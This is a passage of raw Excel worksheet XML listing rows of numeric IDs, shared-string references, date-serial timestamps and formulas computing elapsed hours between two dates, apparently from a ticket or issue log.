        <v>43431.793032407404</v>
      </c>
      <c r="G1041" t="s">
        <v>95</v>
      </c>
      <c r="H1041" t="str">
        <f>TEXT(F1041-E1041,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1042" spans="1:8" hidden="1">
      <c r="A1042" t="s">
        <v>3062</v>
      </c>
      <c r="B1042">
        <v>12453</v>
      </c>
      <c r="C1042" t="s">
        <v>3063</v>
      </c>
      <c r="D1042" t="s">
        <v>7</v>
      </c>
      <c r="E1042" s="1">
        <v>43430.250057870369</v>
      </c>
      <c r="F1042" s="1">
        <v>43433.034525462965</v>
      </c>
      <c r="G1042" t="s">
        <v>118</v>
      </c>
      <c r="H1042" t="str">
        <f>TEXT(F1042-E1042,"[h]")</f>
        <v>66</v>
      </c>
    </row>
    <row r="1043" spans="1:8" hidden="1">
      <c r="A1043" t="s">
        <v>3064</v>
      </c>
      <c r="B1043">
        <v>12452</v>
      </c>
      <c r="C1043" t="s">
        <v>3065</v>
      </c>
      <c r="D1043" t="s">
        <v>7</v>
      </c>
      <c r="E1043" s="1">
        <v>43430.247118055559</v>
      </c>
      <c r="F1043" s="1">
        <v>43555.319143518522</v>
      </c>
      <c r="G1043" t="s">
        <v>66</v>
      </c>
      <c r="H1043" t="str">
        <f>TEXT(F1043-E1043,"[h]")</f>
        <v>3001</v>
      </c>
    </row>
    <row r="1044" spans="1:8" hidden="1">
      <c r="A1044" t="s">
        <v>3066</v>
      </c>
      <c r="B1044">
        <v>12451</v>
      </c>
      <c r="C1044" t="s">
        <v>3067</v>
      </c>
      <c r="D1044" t="s">
        <v>7</v>
      </c>
      <c r="E1044" s="1">
        <v>43430.216574074075</v>
      </c>
      <c r="F1044" s="1">
        <v>43437.775682870371</v>
      </c>
      <c r="G1044" t="s">
        <v>115</v>
      </c>
      <c r="H1044" t="str">
        <f>TEXT(F1044-E1044,"[h]")</f>
        <v>181</v>
      </c>
    </row>
    <row r="1045" spans="1:8" hidden="1">
      <c r="A1045" t="s">
        <v>3068</v>
      </c>
      <c r="B1045">
        <v>12447</v>
      </c>
      <c r="C1045" t="s">
        <v>3069</v>
      </c>
      <c r="D1045" t="s">
        <v>7</v>
      </c>
      <c r="E1045" s="1">
        <v>43428.979224537034</v>
      </c>
      <c r="F1045" s="1">
        <v>43435.770185185182</v>
      </c>
      <c r="G1045" t="s">
        <v>461</v>
      </c>
      <c r="H1045" t="str">
        <f>TEXT(F1045-E1045,"[h]")</f>
        <v>162</v>
      </c>
    </row>
    <row r="1046" spans="1:8" hidden="1">
      <c r="A1046" t="s">
        <v>3070</v>
      </c>
      <c r="B1046">
        <v>12446</v>
      </c>
      <c r="C1046" t="s">
        <v>3071</v>
      </c>
      <c r="D1046" t="s">
        <v>7</v>
      </c>
      <c r="E1046" s="1">
        <v>43428.960057870368</v>
      </c>
      <c r="F1046" s="1">
        <v>43433.591597222221</v>
      </c>
      <c r="G1046" t="s">
        <v>43</v>
      </c>
      <c r="H1046" t="str">
        <f>TEXT(F1046-E1046,"[h]")</f>
        <v>111</v>
      </c>
    </row>
    <row r="1047" spans="1:8" hidden="1">
      <c r="A1047" t="s">
        <v>3072</v>
      </c>
      <c r="B1047">
        <v>12445</v>
      </c>
      <c r="C1047" t="s">
        <v>3073</v>
      </c>
      <c r="D1047" t="s">
        <v>7</v>
      </c>
      <c r="E1047" s="1">
        <v>43428.926377314812</v>
      </c>
      <c r="F1047" s="1">
        <v>43435.75271990741</v>
      </c>
      <c r="G1047" t="s">
        <v>174</v>
      </c>
      <c r="H1047" t="str">
        <f>TEXT(F1047-E1047,"[h]")</f>
        <v>163</v>
      </c>
    </row>
    <row r="1048" spans="1:8" hidden="1">
      <c r="A1048" t="s">
        <v>3074</v>
      </c>
      <c r="B1048">
        <v>12443</v>
      </c>
      <c r="C1048" t="s">
        <v>3075</v>
      </c>
      <c r="D1048" t="s">
        <v>7</v>
      </c>
      <c r="E1048" s="1">
        <v>43428.835486111115</v>
      </c>
      <c r="F1048" s="1">
        <v>43435.761087962965</v>
      </c>
      <c r="G1048" t="s">
        <v>174</v>
      </c>
      <c r="H1048" t="str">
        <f>TEXT(F1048-E1048,"[h]")</f>
        <v>166</v>
      </c>
    </row>
    <row r="1049" spans="1:8">
      <c r="A1049" t="s">
        <v>3076</v>
      </c>
      <c r="B1049">
        <v>12442</v>
      </c>
      <c r="C1049" t="s">
        <v>3077</v>
      </c>
      <c r="D1049" t="s">
        <v>7</v>
      </c>
      <c r="E1049" s="1">
        <v>43428.472245370373</v>
      </c>
      <c r="F1049" s="1">
        <v>43440.738854166666</v>
      </c>
      <c r="G1049" t="s">
        <v>376</v>
      </c>
      <c r="H1049" t="str">
        <f>TEXT(F1049-E1049,"[h]")</f>
        <v>294</v>
      </c>
    </row>
    <row r="1050" spans="1:8">
      <c r="A1050" t="s">
        <v>3078</v>
      </c>
      <c r="B1050">
        <v>12440</v>
      </c>
      <c r="C1050" t="s">
        <v>3079</v>
      </c>
      <c r="D1050" t="s">
        <v>7</v>
      </c>
      <c r="E1050" s="1">
        <v>43427.745000000003</v>
      </c>
      <c r="F1050" s="1">
        <v>43427.997696759259</v>
      </c>
      <c r="G1050" t="s">
        <v>16</v>
      </c>
      <c r="H1050" t="str">
        <f>TEXT(F1050-E1050,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1051" spans="1:8">
      <c r="A1051" t="s">
        <v>3080</v>
      </c>
      <c r="B1051">
        <v>12439</v>
      </c>
      <c r="C1051" t="s">
        <v>3081</v>
      </c>
      <c r="D1051" t="s">
        <v>7</v>
      </c>
      <c r="E1051" s="1">
        <v>43426.735902777778</v>
      </c>
      <c r="F1051" s="1">
        <v>43428.003599537034</v>
      </c>
      <c r="G1051" t="s">
        <v>160</v>
      </c>
      <c r="H1051" t="str">
        <f>TEXT(F1051-E1051,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1052" spans="1:8" hidden="1">
      <c r="A1052" t="s">
        <v>3082</v>
      </c>
      <c r="B1052">
        <v>12437</v>
      </c>
      <c r="C1052" t="s">
        <v>3083</v>
      </c>
      <c r="D1052" t="s">
        <v>7</v>
      </c>
      <c r="E1052" s="1">
        <v>43426.535381944443</v>
      </c>
      <c r="F1052" s="1">
        <v>43429.647928240738</v>
      </c>
      <c r="G1052" t="s">
        <v>3084</v>
      </c>
      <c r="H1052" t="str">
        <f>TEXT(F1052-E1052,"[h]")</f>
        <v>74</v>
      </c>
    </row>
    <row r="1053" spans="1:8">
      <c r="A1053" t="s">
        <v>3085</v>
      </c>
      <c r="B1053">
        <v>12431</v>
      </c>
      <c r="C1053" t="s">
        <v>3086</v>
      </c>
      <c r="D1053" t="s">
        <v>7</v>
      </c>
      <c r="E1053" s="1">
        <v>43425.139340277776</v>
      </c>
      <c r="F1053" s="1">
        <v>43426.161921296298</v>
      </c>
      <c r="G1053" t="s">
        <v>3087</v>
      </c>
      <c r="H1053" t="str">
        <f>TEXT(F1053-E1053,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1054" spans="1:8" hidden="1">
      <c r="A1054" t="s">
        <v>3088</v>
      </c>
      <c r="B1054">
        <v>12430</v>
      </c>
      <c r="C1054" t="s">
        <v>3089</v>
      </c>
      <c r="D1054" t="s">
        <v>7</v>
      </c>
      <c r="E1054" s="1">
        <v>43424.92119212963</v>
      </c>
      <c r="F1054" s="1">
        <v>43457.385208333333</v>
      </c>
      <c r="G1054" t="s">
        <v>3084</v>
      </c>
      <c r="H1054" t="str">
        <f>TEXT(F1054-E1054,"[h]")</f>
        <v>779</v>
      </c>
    </row>
    <row r="1055" spans="1:8" hidden="1">
      <c r="A1055" t="s">
        <v>2666</v>
      </c>
      <c r="B1055">
        <v>12429</v>
      </c>
      <c r="C1055" t="s">
        <v>3090</v>
      </c>
      <c r="D1055" t="s">
        <v>7</v>
      </c>
      <c r="E1055" s="1">
        <v>43424.919282407405</v>
      </c>
      <c r="F1055" s="1">
        <v>43424.942881944444</v>
      </c>
      <c r="G1055" t="s">
        <v>174</v>
      </c>
      <c r="H1055" t="str">
        <f>TEXT(F1055-E1055,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1056" spans="1:8" hidden="1">
      <c r="A1056" t="s">
        <v>3091</v>
      </c>
      <c r="B1056">
        <v>12428</v>
      </c>
      <c r="C1056" t="s">
        <v>3092</v>
      </c>
      <c r="D1056" t="s">
        <v>7</v>
      </c>
      <c r="E1056" s="1">
        <v>43424.802245370367</v>
      </c>
      <c r="F1056" s="1">
        <v>43642.770694444444</v>
      </c>
      <c r="G1056" t="s">
        <v>258</v>
      </c>
      <c r="H1056" t="str">
        <f>TEXT(F1056-E1056,"[h]")</f>
        <v>5231</v>
      </c>
    </row>
    <row r="1057" spans="1:8">
      <c r="A1057" t="s">
        <v>3093</v>
      </c>
      <c r="B1057">
        <v>12424</v>
      </c>
      <c r="C1057" t="s">
        <v>3094</v>
      </c>
      <c r="D1057" t="s">
        <v>7</v>
      </c>
      <c r="E1057" s="1">
        <v>43424.313611111109</v>
      </c>
      <c r="F1057" s="1">
        <v>43424.634444444448</v>
      </c>
      <c r="G1057" t="s">
        <v>19</v>
      </c>
      <c r="H1057" t="str">
        <f>TEXT(F1057-E1057,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1058" spans="1:8" hidden="1">
      <c r="A1058" t="s">
        <v>3095</v>
      </c>
      <c r="B1058">
        <v>12422</v>
      </c>
      <c r="C1058" t="s">
        <v>3096</v>
      </c>
      <c r="D1058" t="s">
        <v>7</v>
      </c>
      <c r="E1058" s="1">
        <v>43424.201932870368</v>
      </c>
      <c r="F1058" s="1">
        <v>43424.231874999998</v>
      </c>
      <c r="G1058" t="s">
        <v>461</v>
      </c>
      <c r="H1058" t="str">
        <f>TEXT(F1058-E1058,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1059" spans="1:8" hidden="1">
      <c r="A1059" t="s">
        <v>3097</v>
      </c>
      <c r="B1059">
        <v>12420</v>
      </c>
      <c r="C1059" t="s">
        <v>3098</v>
      </c>
      <c r="D1059" t="s">
        <v>7</v>
      </c>
      <c r="E1059" s="1">
        <v>43423.640590277777</v>
      </c>
      <c r="F1059" s="1">
        <v>43424.27443287037</v>
      </c>
      <c r="G1059" t="s">
        <v>2054</v>
      </c>
      <c r="H1059" t="str">
        <f>TEXT(F1059-E1059,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1060" spans="1:8" hidden="1">
      <c r="A1060" t="s">
        <v>3099</v>
      </c>
      <c r="B1060">
        <v>12419</v>
      </c>
      <c r="C1060" t="s">
        <v>3100</v>
      </c>
      <c r="D1060" t="s">
        <v>7</v>
      </c>
      <c r="E1060" s="1">
        <v>43423.600960648146</v>
      </c>
      <c r="F1060" s="1">
        <v>43428.93476851852</v>
      </c>
      <c r="G1060" t="s">
        <v>2193</v>
      </c>
      <c r="H1060" t="str">
        <f>TEXT(F1060-E1060,"[h]")</f>
        <v>128</v>
      </c>
    </row>
    <row r="1061" spans="1:8" hidden="1">
      <c r="A1061" t="s">
        <v>3101</v>
      </c>
      <c r="B1061">
        <v>12418</v>
      </c>
      <c r="C1061" t="s">
        <v>3102</v>
      </c>
      <c r="D1061" t="s">
        <v>7</v>
      </c>
      <c r="E1061" s="1">
        <v>43423.570601851854</v>
      </c>
      <c r="F1061" s="1">
        <v>43496.599085648151</v>
      </c>
      <c r="G1061" t="s">
        <v>3103</v>
      </c>
      <c r="H1061" t="str">
        <f>TEXT(F1061-E1061,"[h]")</f>
        <v>1752</v>
      </c>
    </row>
    <row r="1062" spans="1:8">
      <c r="A1062" t="s">
        <v>3104</v>
      </c>
      <c r="B1062">
        <v>12417</v>
      </c>
      <c r="C1062" t="s">
        <v>3105</v>
      </c>
      <c r="D1062" t="s">
        <v>7</v>
      </c>
      <c r="E1062" s="1">
        <v>43423.374143518522</v>
      </c>
      <c r="F1062" s="1">
        <v>43423.717592592591</v>
      </c>
      <c r="G1062" t="s">
        <v>19</v>
      </c>
      <c r="H1062" t="str">
        <f>TEXT(F1062-E1062,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1063" spans="1:8" hidden="1">
      <c r="A1063" t="s">
        <v>3106</v>
      </c>
      <c r="B1063">
        <v>12416</v>
      </c>
      <c r="C1063" t="s">
        <v>3107</v>
      </c>
      <c r="D1063" t="s">
        <v>7</v>
      </c>
      <c r="E1063" s="1">
        <v>43423.365798611114</v>
      </c>
      <c r="F1063" s="1">
        <v>43423.718124999999</v>
      </c>
      <c r="G1063" t="s">
        <v>109</v>
      </c>
      <c r="H1063" t="str">
        <f>TEXT(F1063-E1063,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1064" spans="1:8" hidden="1">
      <c r="A1064" t="s">
        <v>3108</v>
      </c>
      <c r="B1064">
        <v>12414</v>
      </c>
      <c r="C1064" t="s">
        <v>3109</v>
      </c>
      <c r="D1064" t="s">
        <v>7</v>
      </c>
      <c r="E1064" s="1">
        <v>43423.11341435185</v>
      </c>
      <c r="F1064" s="1">
        <v>43423.176238425927</v>
      </c>
      <c r="G1064" t="s">
        <v>28</v>
      </c>
      <c r="H1064" t="str">
        <f>TEXT(F1064-E1064,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1065" spans="1:8">
      <c r="A1065" t="s">
        <v>3110</v>
      </c>
      <c r="B1065">
        <v>12413</v>
      </c>
      <c r="C1065" t="s">
        <v>3111</v>
      </c>
      <c r="D1065" t="s">
        <v>7</v>
      </c>
      <c r="E1065" s="1">
        <v>43423.098530092589</v>
      </c>
      <c r="F1065" s="1">
        <v>43423.171400462961</v>
      </c>
      <c r="G1065" t="s">
        <v>126</v>
      </c>
      <c r="H1065" t="str">
        <f>TEXT(F1065-E1065,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1066" spans="1:8" hidden="1">
      <c r="A1066" t="s">
        <v>3112</v>
      </c>
      <c r="B1066">
        <v>12412</v>
      </c>
      <c r="C1066" t="s">
        <v>3113</v>
      </c>
      <c r="D1066" t="s">
        <v>7</v>
      </c>
      <c r="E1066" s="1">
        <v>43423.066469907404</v>
      </c>
      <c r="F1066" s="1">
        <v>43423.176238425927</v>
      </c>
      <c r="G1066" t="s">
        <v>3114</v>
      </c>
      <c r="H1066" t="str">
        <f>TEXT(F1066-E1066,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1067" spans="1:8" hidden="1">
      <c r="A1067" t="s">
        <v>3115</v>
      </c>
      <c r="B1067">
        <v>12411</v>
      </c>
      <c r="C1067" t="s">
        <v>3116</v>
      </c>
      <c r="D1067" t="s">
        <v>7</v>
      </c>
      <c r="E1067" s="1">
        <v>43423.058009259257</v>
      </c>
      <c r="F1067" s="1">
        <v>43423.171400462961</v>
      </c>
      <c r="G1067" t="s">
        <v>2054</v>
      </c>
      <c r="H1067" t="str">
        <f>TEXT(F1067-E1067,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1068" spans="1:8" hidden="1">
      <c r="A1068" t="s">
        <v>3117</v>
      </c>
      <c r="B1068">
        <v>12410</v>
      </c>
      <c r="C1068" t="s">
        <v>3118</v>
      </c>
      <c r="D1068" t="s">
        <v>7</v>
      </c>
      <c r="E1068" s="1">
        <v>43423.054525462961</v>
      </c>
      <c r="F1068" s="1">
        <v>43423.718194444446</v>
      </c>
      <c r="G1068" t="s">
        <v>28</v>
      </c>
      <c r="H1068" t="str">
        <f>TEXT(F1068-E1068,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1069" spans="1:8" hidden="1">
      <c r="A1069" t="s">
        <v>3119</v>
      </c>
      <c r="B1069">
        <v>12409</v>
      </c>
      <c r="C1069" t="s">
        <v>3120</v>
      </c>
      <c r="D1069" t="s">
        <v>7</v>
      </c>
      <c r="E1069" s="1">
        <v>43422.285578703704</v>
      </c>
      <c r="F1069" s="1">
        <v>43422.422164351854</v>
      </c>
      <c r="G1069" t="s">
        <v>255</v>
      </c>
      <c r="H1069" t="str">
        <f>TEXT(F1069-E1069,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1070" spans="1:8">
      <c r="A1070" t="s">
        <v>3121</v>
      </c>
      <c r="B1070">
        <v>12408</v>
      </c>
      <c r="C1070" t="s">
        <v>3122</v>
      </c>
      <c r="D1070" t="s">
        <v>7</v>
      </c>
      <c r="E1070" s="1">
        <v>43422.277766203704</v>
      </c>
      <c r="F1070" s="1">
        <v>43429.946215277778</v>
      </c>
      <c r="G1070" t="s">
        <v>610</v>
      </c>
      <c r="H1070" t="str">
        <f>TEXT(F1070-E1070,"[h]")</f>
        <v>184</v>
      </c>
    </row>
    <row r="1071" spans="1:8">
      <c r="A1071" t="s">
        <v>3123</v>
      </c>
      <c r="B1071">
        <v>12407</v>
      </c>
      <c r="C1071" t="s">
        <v>3124</v>
      </c>
      <c r="D1071" t="s">
        <v>7</v>
      </c>
      <c r="E1071" s="1">
        <v>43421.768425925926</v>
      </c>
      <c r="F1071" s="1">
        <v>43422.909317129626</v>
      </c>
      <c r="G1071" t="s">
        <v>126</v>
      </c>
      <c r="H1071" t="str">
        <f>TEXT(F1071-E1071,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="1072" spans="1:8" hidden="1">
      <c r="A1072" t="s">
        <v>3127</v>
      </c>
      <c r="B1072">
        <v>12402</v>
      </c>
      <c r="C1072" t="s">
        <v>3128</v>
      </c>
      <c r="D1072" t="s">
        <v>7</v>
      </c>
      <c r="E1072" s="1">
        <v>43420.014131944445</v>
      </c>
      <c r="F1072" s="1">
        <v>43445.437997685185</v>
      </c>
      <c r="G1072" t="s">
        <v>536</v>
      </c>
      <c r="H1072" t="str">
        <f>TEXT(F1072-E1072,"[h]")</f>
        <v>610</v>
      </c>
    </row>
    <row r="1073" spans="1:8" hidden="1">
      <c r="A1073" t="s">
        <v>3129</v>
      </c>
      <c r="B1073">
        <v>12401</v>
      </c>
      <c r="C1073" t="s">
        <v>3130</v>
      </c>
      <c r="D1073" t="s">
        <v>7</v>
      </c>
      <c r="E1073" s="1">
        <v>43420.006979166668</v>
      </c>
      <c r="F1073" s="1">
        <v>43442.250925925924</v>
      </c>
      <c r="G1073" t="s">
        <v>66</v>
      </c>
      <c r="H1073" t="str">
        <f>TEXT(F1073-E1073,"[h]")</f>
        <v>533</v>
      </c>
    </row>
    <row r="1074" spans="1:8" hidden="1">
      <c r="A1074" t="s">
        <v>3131</v>
      </c>
      <c r="B1074">
        <v>12399</v>
      </c>
      <c r="C1074" t="s">
        <v>3132</v>
      </c>
      <c r="D1074" t="s">
        <v>7</v>
      </c>
      <c r="E1074" s="1">
        <v>43419.792037037034</v>
      </c>
      <c r="F1074" s="1">
        <v>43419.849270833336</v>
      </c>
      <c r="G1074" t="s">
        <v>75</v>
      </c>
      <c r="H1074" t="str">
        <f>TEXT(F1074-E1074,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1075" spans="1:8">
      <c r="A1075" t="s">
        <v>3133</v>
      </c>
      <c r="B1075">
        <v>12398</v>
      </c>
      <c r="C1075" t="s">
        <v>3134</v>
      </c>
      <c r="D1075" t="s">
        <v>7</v>
      </c>
      <c r="E1075" s="1">
        <v>43419.770358796297</v>
      </c>
      <c r="F1075" s="1">
        <v>43419.84884259259</v>
      </c>
      <c r="G1075" t="s">
        <v>16</v>
      </c>
      <c r="H1075" t="str">
        <f>TEXT(F1075-E1075,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1076" spans="1:8" hidden="1">
      <c r="A1076" t="s">
        <v>3135</v>
      </c>
      <c r="B1076">
        <v>12397</v>
      </c>
      <c r="C1076" t="s">
        <v>3136</v>
      </c>
      <c r="D1076" t="s">
        <v>7</v>
      </c>
      <c r="E1076" s="1">
        <v>43419.632916666669</v>
      </c>
      <c r="F1076" s="1">
        <v>43419.658333333333</v>
      </c>
      <c r="G1076" t="s">
        <v>304</v>
      </c>
      <c r="H1076" t="str">
        <f>TEXT(F1076-E1076,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1077" spans="1:8" hidden="1">
      <c r="A1077" t="s">
        <v>3137</v>
      </c>
      <c r="B1077">
        <v>12396</v>
      </c>
      <c r="C1077" t="s">
        <v>3138</v>
      </c>
      <c r="D1077" t="s">
        <v>7</v>
      </c>
      <c r="E1077" s="1">
        <v>43419.614606481482</v>
      </c>
      <c r="F1077" s="1">
        <v>43424.274687500001</v>
      </c>
      <c r="G1077" t="s">
        <v>2054</v>
      </c>
      <c r="H1077" t="str">
        <f>TEXT(F1077-E1077,"[h]")</f>
        <v>111</v>
      </c>
    </row>
    <row r="1078" spans="1:8">
      <c r="A1078" t="s">
        <v>3139</v>
      </c>
      <c r="B1078">
        <v>12394</v>
      </c>
      <c r="C1078" t="s">
        <v>3140</v>
      </c>
      <c r="D1078" t="s">
        <v>7</v>
      </c>
      <c r="E1078" s="1">
        <v>43419.458379629628</v>
      </c>
      <c r="F1078" s="1">
        <v>43730.846134259256</v>
      </c>
      <c r="G1078" t="s">
        <v>25</v>
      </c>
      <c r="H1078" t="str">
        <f>TEXT(F1078-E1078,"[h]")</f>
        <v>7473</v>
      </c>
    </row>
    <row r="1079" spans="1:8" hidden="1">
      <c r="A1079" t="s">
        <v>3141</v>
      </c>
      <c r="B1079">
        <v>12392</v>
      </c>
      <c r="C1079" t="s">
        <v>3142</v>
      </c>
      <c r="D1079" t="s">
        <v>7</v>
      </c>
      <c r="E1079" s="1">
        <v>43419.378148148149</v>
      </c>
      <c r="F1079" s="1">
        <v>43419.577106481483</v>
      </c>
      <c r="G1079" t="s">
        <v>66</v>
      </c>
      <c r="H1079" t="str">
        <f>TEXT(F1079-E1079,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1080" spans="1:8" hidden="1">
      <c r="A1080" t="s">
        <v>3143</v>
      </c>
      <c r="B1080">
        <v>12391</v>
      </c>
      <c r="C1080" t="s">
        <v>3144</v>
      </c>
      <c r="D1080" t="s">
        <v>7</v>
      </c>
      <c r="E1080" s="1">
        <v>43419.125138888892</v>
      </c>
      <c r="F1080" s="1">
        <v>43419.796087962961</v>
      </c>
      <c r="G1080" t="s">
        <v>1230</v>
      </c>
      <c r="H1080" t="str">
        <f>TEXT(F1080-E1080,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="1081" spans="1:8" hidden="1">
      <c r="A1081" t="s">
        <v>3145</v>
      </c>
      <c r="B1081">
        <v>12390</v>
      </c>
      <c r="C1081" t="s">
        <v>3146</v>
      </c>
      <c r="D1081" t="s">
        <v>7</v>
      </c>
      <c r="E1081" s="1">
        <v>43419.117708333331</v>
      </c>
      <c r="F1081" s="1">
        <v>43419.581689814811</v>
      </c>
      <c r="G1081" t="s">
        <v>174</v>
      </c>
      <c r="H1081" t="str">
        <f>TEXT(F1081-E1081,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1082" spans="1:8" hidden="1">
      <c r="A1082" t="s">
        <v>3147</v>
      </c>
      <c r="B1082">
        <v>12388</v>
      </c>
      <c r="C1082" t="s">
        <v>3148</v>
      </c>
      <c r="D1082" t="s">
        <v>7</v>
      </c>
      <c r="E1082" s="1">
        <v>43418.809849537036</v>
      </c>
      <c r="F1082" s="1">
        <v>43440.814305555556</v>
      </c>
      <c r="G1082" t="s">
        <v>37</v>
      </c>
      <c r="H1082" t="str">
        <f>TEXT(F1082-E1082,"[h]")</f>
        <v>528</v>
      </c>
    </row>
    <row r="1083" spans="1:8" hidden="1">
      <c r="A1083" t="s">
        <v>3149</v>
      </c>
      <c r="B1083">
        <v>12386</v>
      </c>
      <c r="C1083" t="s">
        <v>3150</v>
      </c>
      <c r="D1083" t="s">
        <v>7</v>
      </c>
      <c r="E1083" s="1">
        <v>43418.704930555556</v>
      </c>
      <c r="F1083" s="1">
        <v>43419.849270833336</v>
      </c>
      <c r="G1083" t="s">
        <v>412</v>
      </c>
      <c r="H1083" t="str">
        <f>TEXT(F1083-E1083,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="1084" spans="1:8" hidden="1">
      <c r="A1084" t="s">
        <v>3151</v>
      </c>
      <c r="B1084">
        <v>12382</v>
      </c>
      <c r="C1084" t="s">
        <v>3152</v>
      </c>
      <c r="D1084" t="s">
        <v>7</v>
      </c>
      <c r="E1084" s="1">
        <v>43418.184490740743</v>
      </c>
      <c r="F1084" s="1">
        <v>43419.005914351852</v>
      </c>
      <c r="G1084" t="s">
        <v>461</v>
      </c>
      <c r="H1084" t="str">
        <f>TEXT(F1084-E1084,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="1085" spans="1:8">
      <c r="A1085" t="s">
        <v>3153</v>
      </c>
      <c r="B1085">
        <v>12381</v>
      </c>
      <c r="C1085" t="s">
        <v>3154</v>
      </c>
      <c r="D1085" t="s">
        <v>7</v>
      </c>
      <c r="E1085" s="1">
        <v>43417.932800925926</v>
      </c>
      <c r="F1085" s="1">
        <v>43419.584398148145</v>
      </c>
      <c r="G1085" t="s">
        <v>31</v>
      </c>
      <c r="H1085" t="str">
        <f>TEXT(F1085-E1085,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="1086" spans="1:8" hidden="1">
      <c r="A1086" t="s">
        <v>3155</v>
      </c>
      <c r="B1086">
        <v>12378</v>
      </c>
      <c r="C1086" t="s">
        <v>3156</v>
      </c>
      <c r="D1086" t="s">
        <v>7</v>
      </c>
      <c r="E1086" s="1">
        <v>43417.69332175926</v>
      </c>
      <c r="F1086" s="1">
        <v>43418.062789351854</v>
      </c>
      <c r="G1086" t="s">
        <v>103</v>
      </c>
      <c r="H1086" t="str">
        <f>TEXT(F1086-E1086,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1087" spans="1:8" hidden="1">
      <c r="A1087" t="s">
        <v>3157</v>
      </c>
      <c r="B1087">
        <v>12377</v>
      </c>
      <c r="C1087" t="s">
        <v>3158</v>
      </c>
      <c r="D1087" t="s">
        <v>7</v>
      </c>
      <c r="E1087" s="1">
        <v>43417.651446759257</v>
      </c>
      <c r="F1087" s="1">
        <v>43417.664895833332</v>
      </c>
      <c r="G1087" t="s">
        <v>998</v>
      </c>
      <c r="H1087" t="str">
        <f>TEXT(F1087-E1087,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1088" spans="1:8">
      <c r="A1088" t="s">
        <v>3159</v>
      </c>
      <c r="B1088">
        <v>12376</v>
      </c>
      <c r="C1088" t="s">
        <v>3160</v>
      </c>
      <c r="D1088" t="s">
        <v>7</v>
      </c>
      <c r="E1088" s="1">
        <v>43417.619074074071</v>
      </c>
      <c r="F1088" s="1">
        <v>43418.987361111111</v>
      </c>
      <c r="G1088" t="s">
        <v>16</v>
      </c>
      <c r="H1088" t="str">
        <f>TEXT(F1088-E1088,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="1089" spans="1:8" hidden="1">
      <c r="A1089" t="s">
        <v>3161</v>
      </c>
      <c r="B1089">
        <v>12375</v>
      </c>
      <c r="C1089" t="s">
        <v>3162</v>
      </c>
      <c r="D1089" t="s">
        <v>7</v>
      </c>
      <c r="E1089" s="1">
        <v>43417.606863425928</v>
      </c>
      <c r="F1089" s="1">
        <v>43423.099641203706</v>
      </c>
      <c r="G1089" t="s">
        <v>3163</v>
      </c>
      <c r="H1089" t="str">
        <f>TEXT(F1089-E1089,"[h]")</f>
        <v>131</v>
      </c>
    </row>
    <row r="1090" spans="1:8" hidden="1">
      <c r="A1090" t="s">
        <v>3164</v>
      </c>
      <c r="B1090">
        <v>12373</v>
      </c>
      <c r="C1090" t="s">
        <v>3165</v>
      </c>
      <c r="D1090" t="s">
        <v>7</v>
      </c>
      <c r="E1090" s="1">
        <v>43417.297824074078</v>
      </c>
      <c r="F1090" s="1">
        <v>43417.54451388889</v>
      </c>
      <c r="G1090" t="s">
        <v>28</v>
      </c>
      <c r="H1090" t="str">
        <f>TEXT(F1090-E1090,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1091" spans="1:8" hidden="1">
      <c r="A1091" t="s">
        <v>3166</v>
      </c>
      <c r="B1091">
        <v>12369</v>
      </c>
      <c r="C1091" t="s">
        <v>3167</v>
      </c>
      <c r="D1091" t="s">
        <v>7</v>
      </c>
      <c r="E1091" s="1">
        <v>43416.705868055556</v>
      </c>
      <c r="F1091" s="1">
        <v>43481.379189814812</v>
      </c>
      <c r="G1091" t="s">
        <v>118</v>
      </c>
      <c r="H1091" t="str">
        <f>TEXT(F1091-E1091,"[h]")</f>
        <v>1552</v>
      </c>
    </row>
    <row r="1092" spans="1:8" hidden="1">
      <c r="A1092" t="s">
        <v>3168</v>
      </c>
      <c r="B1092">
        <v>12366</v>
      </c>
      <c r="C1092" t="s">
        <v>3169</v>
      </c>
      <c r="D1092" t="s">
        <v>7</v>
      </c>
      <c r="E1092" s="1">
        <v>43415.158784722225</v>
      </c>
      <c r="F1092" s="1">
        <v>43415.883206018516</v>
      </c>
      <c r="G1092" t="s">
        <v>28</v>
      </c>
      <c r="H1092" t="str">
        <f>TEXT(F1092-E1092,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="1093" spans="1:8" hidden="1">
      <c r="A1093" t="s">
        <v>3170</v>
      </c>
      <c r="B1093">
        <v>12363</v>
      </c>
      <c r="C1093" t="s">
        <v>3171</v>
      </c>
      <c r="D1093" t="s">
        <v>7</v>
      </c>
      <c r="E1093" s="1">
        <v>43414.939247685186</v>
      </c>
      <c r="F1093" s="1">
        <v>43415.878078703703</v>
      </c>
      <c r="G1093" t="s">
        <v>1302</v>
      </c>
      <c r="H1093" t="str">
